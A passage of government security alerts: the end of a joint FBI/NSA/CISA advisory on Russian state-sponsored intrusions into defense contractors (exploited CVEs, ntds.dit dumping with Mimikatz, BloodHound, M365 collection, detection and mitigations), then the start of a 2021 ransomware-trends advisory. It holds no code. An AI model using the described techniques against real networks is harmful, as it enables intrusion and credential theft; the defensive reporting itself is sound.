  • The threat actors use harvested credentials in conjunction with known vulnerabilities—for example, CVE-2020-0688 and CVE-2020-17144—on public-facing applications [T1078, T1190], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[1] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. 
  • As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.
Credential Access 

After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database ntds.dit [T1003.003]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers. 

Collection

Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [T1213.002], user profiles, and user emails [T1114.002].

Command and Control

The threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [T1090.003].

Persistence

In multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [T1078], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.

Tactics, Techniques, and Procedures

The following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. Note: for specific countermeasures related to each ATT&CK technique, see the Enterprise Mitigations section and MITRE D3FEND™.
 

Table 1: Observed Tactics, Techniques, and Procedures (TTPs)

Tactic Technique Procedure

Reconnaissance [TA0043]

Credential Access [TA0006]

Gather Victim Identity Information: Credentials [T1589.001

Brute Force [T1110]

Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access.  Initial Access [TA0001] External Remote Services [T1133] Threat actors continue to research vulnerabilities in Fortinet’s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [2]

Initial Access [TA0001]

Privilege Escalation [TA0004]

Valid Accounts [T1078]

Exploit Public-Facing Application [T1190]

Threat actors used credentials in conjunction with known vulnerabilities on public-facing applications, such as virtual private networks (VPNs)—CVE-2020-0688 and CVE-2020-17144—to escalate privileges and gain remote code execution (RCE) on the exposed applications. [3]

Initial Access [TA0001]


Defense Evasion [TA0005]

Phishing: Spearphishing Link [T1566.002]

Obfuscated Files or Information [T1027]

Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link. 

Initial Access [TA0001]


Credential Access [TA0006]

OS Credential Dumping: NTDS [T1003.003]

Valid Accounts: Domain Accounts [T1078.002]

Threat actors logged into a victim’s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database ntds.dit.

Initial Access [TA0001]

Privilege Escalation [TA0004]

Collection [TA0009]

Valid Accounts: Cloud Accounts [T1078.004]

Data from Information Repositories: SharePoint [T1213.002]

In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes.

Initial Access [TA0001]

Collection [TA0009]

Valid Accounts: Domain Accounts [T1078.002]

Email Collection [T1114]

In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system.

Persistence [TA0003]

Lateral Movement [TA0008]

Valid Accounts [T1078] Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access. Discovery [TA0007] File and Network Discovery [T1083] After gaining access to networks, the threat actors used BloodHound to map the Active Directory.  Discovery [TA0007] Domain Trust Discovery [T1482] Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities. Command and Control [TA0011] Proxy: Multi-hop Proxy [T1090.003] Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target.   Detection

The FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. Note: for additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Detect Unusual Activity

Implement robust log collection and retention. Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, tools and solutions include:

  • Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.
  • Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. Note: for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments.
Look for Evidence of Known TTPs
  • Look for behavioral evidence or network and host-based artifacts from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts. 
  • To detect use of compromised credentials in combination with a VPS, follow the steps below:
    • Review logs for suspicious “impossible logins,” such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location.
    • Look for one IP used for multiple accounts, excluding expected logins.
    • Search for “impossible travel,” which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.
    • Evaluate processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the ntds.dit file from a domain controller. 
    • Identify suspicious privileged account use after resetting passwords or applying user account mitigations. 
    • Review logs for unusual activity in typically dormant accounts.
    • Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.
Incident Response and Remediation

Organizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.

  • Reset passwords for all local accounts. These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. Note: reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully on large AD environments. Refer to Microsoft’s AD Forest Recovery - Resetting the krbtgt password guidance and automation script for additional information. [4][5]
  • Reset all domain user, admin, and service account passwords. 

Note: for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise. Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the SolarWinds Orion supply chain compromise, the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors.

Mitigations

The FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate against common malicious activity. 

Implement Credential Hardening Enable Multifactor Authentication
  • Enable multifactor authentication (MFA) for all users, without exception. Subsequent authentication may not require MFA, enabling the possibility to bypass MFA by reusing single factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions will cause account re-validation of their MFA requirements.[6] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single factor authentication assertions.[7
Enforce Strong, Unique Passwords
  • Require accounts to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Enable password management functions, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.
Introduce Account Lockout and Time-Based Access Features
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Configure time-based access for accounts set at the admin level and higher. For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.
Reduce Credential Exposure
  • Use virtualization solutions on modern hardware and software to ensure credentials are securely stored, and protect credentials via capabilities, such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[8] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[9][10] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). Installation of Windows 11 requires TPM v2.0.[11] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[12][13]
Establish Centralized Log Management
  • Create a centralized log management system. Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment. 
    • Forward all logs to a SIEM tool.
    • Ensure logs are searchable.
    • Retain critical and historic network activity logs for a minimum of 180 days. 
  • If using M365, enable Unified Audit Log (UAL)—M365’s logging capability—which contains events from Exchange Online, SharePoint online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services. 
  • Correlate logs, including M365 logs, from network and host security devices. This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365. 

In addition to setting up centralized logging, organizations should:

  • Ensure PowerShell logging is turned on. Threat actors often use PowerShell to hide their malicious activities.[14] 
  • Update PowerShell instances to version 5.0 or later and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities. 
  • Confirm PowerShell 5.0 instances have module, script block, and transcription logging enabled.
  • Monitor remote access/Remote Desktop Protocol (RDP) logs and disable unused remote access/RDP ports.
Initiate a Software and Patch Management Program 
  • Consider using a centralized patch management system. Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise. Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[15
    • If an organization is unable to update all software shortly after a patch is released, prioritize patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). 
    • Subscribe to CISA cybersecurity notifications and advisories to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. 
  • Sign up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats. CISA’s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.
Employ Antivirus Programs 
  • Ensure that antivirus applications are installed on all organizations’ computers and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. 
  • Keep virus definitions up to date.
  • Regularly monitor antivirus scans. 
Use Endpoint Detection and Response Tools 
  • Utilize endpoint detection and response (EDR) tools. These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. 
Maintain Rigorous Configuration Management Programs 
  • Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[16
Enforce the Principle of Least Privilege
  • Apply the principle of least privilege. Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised.  
  • For M365, assign administrator roles to role-based access control (RBAC) to implement the principle of least privilege. Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Using Azure AD’s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning unnecessary privileges. Note: refer to the Microsoft documentation, Azure AD built-in roles, for more information about Azure AD. 
  • Remove privileges not expressly required by an account’s function or role. 
  • Ensure there are unique and distinct administrative accounts for each set of administrative tasks. 
  • Create non-privileged accounts for privileged users, and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).
  • Reduce the number of domain and enterprise administrator accounts, and remove all accounts that are unnecessary.
  • Regularly audit administrative user accounts.
  • Regularly audit logs to ensure new accounts are legitimate users.
  • Institute a group policy that disables remote interactive logins, and use Domain Protected Users Group.

To assist with identifying suspicious behavior with administrative accounts:

  • Create privileged role tracking.
  • Create a change control process for all privilege escalations and role changes on user accounts.
  • Enable alerts on privilege escalations and role changes.
  • Log privileged user changes in the network environment, and create an alert for unusual events.
Review Trust Relationships
  • Review existing trust relationships with IT service providers, such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data.  
  • Remove unnecessary trust relationships.  
  • Review contractual relationships with all service providers, and ensure contracts include: 
    • Security controls the customer deems appropriate. 
    • Appropriate monitoring and logging of provider-managed customer systems.
    • Appropriate monitoring of the service provider’s presence, activities, and connections to the customer network.
    • Notification of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks.

Note: review CISA’s page on APTs Targeting IT Service Provider Customers and CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses for additional recommendations for MSP and CSP customers.

Encourage Remote Work Environment Best Practices

With the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices. Note: for additional information, see joint NSA-CISA Cybersecurity Information Sheet: Selecting and Hardening Remote Access VPN Solutions.

  • Regularly update VPNs, network infrastructure devices, and devices used for remote work environments with the latest software patches and security configurations.
  • When possible, require MFA on all VPN connections. Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.
  • Monitor network traffic for unapproved and unexpected protocols.
  • Reduce potential attack surfaces by discontinuing unused VPN servers that may be used as a point of entry by adversaries.
Establish User Awareness Best Practices

Cyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:

  • Provide end user awareness and training. To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.
  • Inform employees of the risks of social engineering attacks, e.g., risks associated with posting detailed career information to social or professional networking sites.
  • Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion to help quickly and efficiently identify threats and employ mitigation strategies.
Apply Additional Best Practice Mitigations
  • Deny atypical inbound activity from known anonymization services, including commercial VPN services and The Onion Router (TOR).
  • Impose listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Identify and create offline backups for critical assets.
  • Implement network segmentation.
  • Review CISA Alert AA20-120A: Microsoft Office 365 Security Recommendations for additional recommendations on hardening M365 cloud environments.
Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to rewardsforjustice.net.

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA. 

Contact Information

To report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov. For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or Cybersecurity_Requests@nsa.gov. Defense Industrial Base companies may additionally sign up for NSA’s free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at dib_defense@cyber.nsa.gov

Appendix: Detailed Tactics, Techniques, and Procedures Reconnaissance [TA0043]

Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials  [T1589.001].[17]

 

ID Name Description T1589.001 Gather Victim Identity Information: Credentials Adversaries may gather credentials that can be used during targeting.

 

Initial Access [TA0001]

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [T1078].[18] These specific actors obtained and abused credentials of domain [T1078.002] and cloud accounts [T1078.004].[19] The actors also used external remote services to gain access to systems [T1133].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [T1190].[21] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [T1566.002].[22] 
 

 

ID Name Description T1078 Valid Accounts  Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. T1078.002 Valid Accounts: Domain Accounts Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. T1078.004 Valid Accounts: Cloud Accounts Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. T1133 External Remote Services Adversaries may leverage external-facing remote services to initially access and/or persist within a network. T1190 Exploit Public-Facing Application Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. T1566.002 Phishing: Spearphishing Link Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. 

 

Persistence [TA0003]

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [T1078].[23

 

ID Name  Description T1078 Valid Accounts Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Privilege Escalation [TA0004]

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [T1078].[24]  Specifically in this case, credentials of cloud accounts [T1078.004] were obtained and abused.[25]   

 

ID Name Description T1078 Valid Accounts Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. T1078.004 Valid Accounts: Cloud Accounts Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Defense Evasion [TA0005]

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit [T1027].[26
 

ID Name Description T1027 Obfuscated Files or Information Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

 

Credential Access [TA0006]

Credential Access consists of techniques for stealing credentials like account names and passwords. The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [T1003.003].[27] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [T1110.003].[28

ID Name Description T1003.003 OS Credential Dumping: NTDS Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.  T1110.003 Brute Force: Password Spraying Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.  Discovery [TA0007]

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [T1083].[29]  In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [T1482].[30] 

ID Name Description T1083 File and Directory Discovery Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.  T1482 Domain Trust Discovery Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

 

Collection [TA0009]

Collection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [T1213.002].[31]   

ID Name Description T1213.002 Data from Information Repositories: SharePoint Adversaries may leverage the SharePoint repository as a source to mine valuable information. 

 

Command and Control [TA0011]

Command and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic. In this case, TOR and VPN servers are used as multi-hop proxies to route C2 traffic and obfuscate their activities [T1090.003].[32
 

ID Name Description T1090.003 Proxy: Multi-hop Proxy To disguise the source of malicious traffic, adversaries may chain together multiple proxies. 

 

Additional Resources

[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments, 1 July 2021.
[2] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities, 7 October 2019.
[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments, 1 July 2021.
[4] Microsoft Article: AD Forest Recovery – Resetting the krbtgt password, 29 July 2021. 
[5] Microsoft GitHub: New-KrbtgtKeys.ps1, 14 May 2020.
[6] NSA Cybersecurity Information: Defend Privileges and Accounts, August 2019.
[7] Microsoft Article: Group Managed Service Accounts Overview, 29 July 2021.
[8] NSA Cybersecurity Information: Leverage Modern Hardware Security Features, August 2019.
[9] Microsoft Article: Protect derived domain credentials with Windows Defender Credential Guard, 3 December 2021.
[10] Microsoft Article: Windows Defender Credential Guard protection limits, 3 December 2021.
[11] Microsoft Article: Windows 11 requirements, 30 November 2021.
[12] Microsoft Blog Post: The Importance of KB2871997 and KB2928120 for Credential Protection, 20 September 2021.
[13] Microsoft Article: What’s New in Credential Protection, 7 January 2022.
[14] NSA Cybersecurity Factsheet: PowerShell: Security Risks and Defenses, 1 December 2016.
[15] NSA Cybersecurity Information: Update and Upgrade Software Immediately, August 2019.
[16] NSA Cybersecurity Information: Actively Manage Systems and Configurations, August 2019.
[17] MITRE Groups: APT28, 18 October 2021.
[18] MITRE Groups: APT28, 18 October 2021.
[19] MITRE Software: Cobalt Strike, 18 October 2021.
[20] Based on technical information shared by Mandiant.
[21] MITRE Groups: APT28, 18 October 2021.
[22] Based on technical information shared by Mandiant.
[23] MITRE Groups: APT28, 18 October 2021.
[24] MITRE Groups: APT28, 18 October 2021.
[25] MITRE Software: Cobalt Strike, 18 October 2021.
[26] MITRE Software: Fysbis, 6 November 2020. 
[27] MITRE Software: Koadic, 30 March 2020. 
[28] MITRE Groups: APT28, 18 October 2021.
[29] Based on technical information shared by Mandiant.
[30] Based on technical information shared by Mandiant.
[31] MITRE Groups: APT28, 18 October 2021.
[32] MITRE Groups: APT28, 18 October 2021.

Revisions
  • February 16, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-040A: 2021 Trends Show Increased Globalized Threat of Ransomware

US-CERT Security Alerts - Wed, 02/09/2022 - 06:00
Original release date: February 9, 2022 | Last revised: February 10, 2022
Summary

Immediate Actions You Can Take Now to Protect Against Ransomware: • Update your operating system and software.
• Implement user training and phishing exercises to raise awareness about the risk of suspicious links and attachments.
• If you use Remote Desktop Protocol (RDP), secure and monitor it.
• Make an offline backup of your data.
• Use multifactor authentication (MFA).

In 2021, cybersecurity authorities in the United States,[1][2][3] Australia,[4] and the United Kingdom[5] observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) observed incidents involving ransomware against 14 of the 16 U.S. critical infrastructure sectors, including the Defense Industrial Base, Emergency Services, Food and Agriculture, Government Facilities, and Information Technology Sectors. The Australian Cyber Security Centre (ACSC) observed continued ransomware targeting of Australian critical infrastructure entities, including in the Healthcare and Medical, Financial Services and Markets, Higher Education and Research, and Energy Sectors. The United Kingdom’s National Cyber Security Centre (NCSC-UK) recognizes ransomware as the biggest cyber threat facing the United Kingdom. Education is one of the top UK sectors targeted by ransomware actors, but the NCSC-UK has also seen attacks targeting businesses, charities, the legal profession, and public services in the Local Government and Health Sectors.

Ransomware tactics and techniques continued to evolve in 2021, which demonstrates ransomware threat actors’ growing technological sophistication and an increased ransomware threat to organizations globally.

This joint Cybersecurity Advisory—authored by cybersecurity authorities in the United States, Australia, and the United Kingdom—provides observed behaviors and trends as well as mitigation recommendations to help network defenders reduce their risk of compromise by ransomware.

Click here for a PDF version of this report.

Technical Details

Cybersecurity authorities in the United States, Australia, and the United Kingdom observed the following behaviors and trends among cyber criminals in 2021:

  • Gaining access to networks via phishing, stolen Remote Desktop Protocols (RDP) credentials or brute force, and exploiting vulnerabilities. Phishing emails, RDP exploitation, and exploitation of software vulnerabilities remained the top three initial infection vectors for ransomware incidents in 2021. Once a ransomware threat actor has gained code execution on a device or network access, they can deploy ransomware. Note: these infection vectors likely remain popular because of the increased use of remote work and schooling starting in 2020 and continuing through 2021. This increase expanded the remote attack surface and left network defenders struggling to keep pace with routine software patching.
  • Using cybercriminal services-for-hire. The market for ransomware became increasingly “professional” in 2021, and the criminal business model of ransomware is now well established. In addition to their increased use of ransomware-as-a-service (RaaS), ransomware threat actors employed independent services to negotiate payments, assist victims with making payments, and arbitrate payment disputes between themselves and other cyber criminals. NCSC-UK observed that some ransomware threat actors offered their victims the services of a 24/7 help center to expedite ransom payment and restoration of encrypted systems or data.

Note: cybersecurity authorities in the United States, Australia, and the United Kingdom assess that if the ransomware criminal business model continues to yield financial returns for ransomware actors, ransomware incidents will become more frequent. Every time a ransom is paid, it confirms the viability and financial attractiveness of the ransomware criminal business model. Additionally, cybersecurity authorities in the United States, Australia, and the United Kingdom note that the criminal business model often complicates attribution because there are complex networks of developers, affiliates, and freelancers; it is often difficult to identify conclusively the actors behind a ransomware incident.

  • Sharing victim information. Eurasian ransomware groups have shared victim information with each other, diversifying the threat to targeted organizations. For example, after announcing its shutdown, the BlackMatter ransomware group transferred its existing victims to infrastructure owned by another group, known as Lockbit 2.0. In October 2021, Conti ransomware actors began selling access to victims’ networks, enabling follow-on attacks by other cyber threat actors.
  • Shifting away from “big-game” hunting in the United States. 
    • In the first half of 2021, cybersecurity authorities in the United States and Australia observed ransomware threat actors targeting “big game” organizations—i.e., perceived high-value organizations and/or those that provide critical services—in several high-profile incidents. These victims included Colonial Pipeline Company, JBS Foods, and Kaseya Limited. However, ransomware groups suffered disruptions from U.S. authorities in mid-2021. Subsequently, the FBI observed some ransomware threat actors redirecting ransomware efforts away from “big-game” and toward mid-sized victims to reduce scrutiny. 
    • The ACSC observed ransomware continuing to target Australian organizations of all sizes, including critical services and “big game,” throughout 2021. 
    • NCSC-UK observed targeting of UK organizations of all sizes throughout the year, with some “big game” victims. Overall victims included businesses, charities, the legal profession, and public services in the Education, Local Government, and Health Sectors.
  • Diversifying approaches to extorting money. After encrypting victim networks, ransomware threat actors increasingly used “triple extortion” by threatening to (1) publicly release stolen sensitive information, (2) disrupt the victim’s internet access, and/or (3) inform the victim’s partners, shareholders, or suppliers about the incident. The ACSC continued to observe “double extortion” incidents in which a threat actor uses a combination of encryption and data theft to pressure victims to pay ransom demands. 

Ransomware groups have increased their impact by:

  • Targeting the cloud. Ransomware developers targeted cloud infrastructures to exploit known vulnerabilities in cloud applications, virtual machine software, and virtual machine orchestration software. Ransomware threat actors also targeted cloud accounts, cloud application programming interfaces (APIs), and data backup and storage systems to deny access to cloud resources and encrypt data. In addition to exploiting weaknesses to gain direct access, threat actors sometimes reach cloud storage systems by compromising local (on-premises) devices and moving laterally to the cloud systems. Ransomware threat actors have also targeted cloud service providers to encrypt large amounts of customer data.
  • Targeting managed service providers. Ransomware threat actors have targeted managed service providers (MSPs). MSPs have widespread and trusted accesses into client organizations. By compromising an MSP, a ransomware threat actor could access multiple victims through one initial compromise. Cybersecurity authorities in the United States, Australia, and the United Kingdom assess there will be an increase in ransomware incidents where threat actors target MSPs to reach their clients.
  • Attacking industrial processes. Although most ransomware incidents against critical infrastructure affect business information and technology systems, the FBI observed that several ransomware groups have developed code designed to stop critical infrastructure or industrial processes.
  • Attacking the software supply chain. Globally, in 2021, ransomware threat actors targeted software supply chain entities to subsequently compromise and extort their customers. Targeting software supply chains allows ransomware threat actors to increase the scale of their attacks by accessing multiple victims through a single initial compromise. 
  • Targeting organizations on holidays and weekends. The FBI and CISA observed cybercriminals conducting increasingly impactful attacks against U.S. entities on holidays and weekends throughout 2021. Ransomware threat actors may view holidays and weekends—when offices are normally closed—as attractive timeframes, as there are fewer network defenders and IT support personnel at victim organizations. For more information, see joint FBI-CISA Cybersecurity Advisory, Ransomware Awareness for Holidays and Weekends.
Mitigations

Cybersecurity authorities in the United States, Australia, and the United Kingdom recommend network defenders apply the following mitigations to reduce the likelihood and impact of ransomware incidents:

